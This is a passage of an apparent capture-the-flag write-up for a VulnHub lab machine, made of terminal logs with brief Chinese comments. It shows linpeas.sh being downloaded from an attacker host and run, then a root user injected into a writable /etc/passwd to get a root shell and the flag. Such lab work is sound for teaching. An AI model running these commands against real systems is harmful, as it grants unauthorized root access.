!!!!!!!!!!!!!!!!!!WECOME TO THE PARTY!!!!!!!!!!!!!!!!!!!!!
#########################################################
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
Last login: Fri Jul 31 10:36:15 2020 from 192.168.1.101
docksec@uninvited:~$ id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
docksec@uninvited:~$
docksec@uninvited:/home/jeevan$ cd /tmp
docksec@uninvited:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
--2023-03-04 14:50:16-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=====================================================>] 747.87K --.-KB/s in 0.003s
2023-03-04 14:50:16 (255 MB/s) - ‘linpeas.sh’ saved [765823/765823]
docksec@uninvited:/tmp$ chmod +x linpeas.sh
docksec@uninvited:/tmp$ ./linpeas.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
创建一个密码,然后将密码以及用户名信息追加到/etc/passwd文件中。
ocksec@uninvited:/tmp$ echo 'jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash' >> /etc/passwd
docksec@uninvited:/tmp$ su - jason
Password:
root@uninvited:~# cd /root
root@uninvited:~# ls -alh
total 44K
drwx------ 6 root root 4.0K Jul 29 2020 .
drwxr-xr-x 23 root root 4.0K Jul 28 2020 ..
-rw------- 1 root root 3.5K Jul 30 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Jul 29 2020 .cache
drwx------ 3 root root 4.0K Jul 29 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Jul 28 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxr-xr-x 3 root root 4.0K Jul 28 2020 ProjectX
-rw-r--r-- 1 root root 376 Jul 28 2020 root.txt
-rw-r--r-- 1 root root 66 Jul 28 2020 .selected_editor
root@uninvited:~# cat root.txt
.__ .__ __ .___
__ __ ____ |__| _______ _|___/ |_ ____ __| _/
| | \/ \| |/ \ \/ | \ ___/ __ \ / __ |
| | | | | | | \ /| || | \ ___// /_/ |
|____/|___| |__|___| /\_/ |__||__| \___ \____ |
\/ \/ \/ \/
FLAG{58DSFJ74RFWESD8J2LKJGHJ87ER4QREWRFLMSTDCMGKAASD}
root@uninvited:~#
最终拿到了root shell以及root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
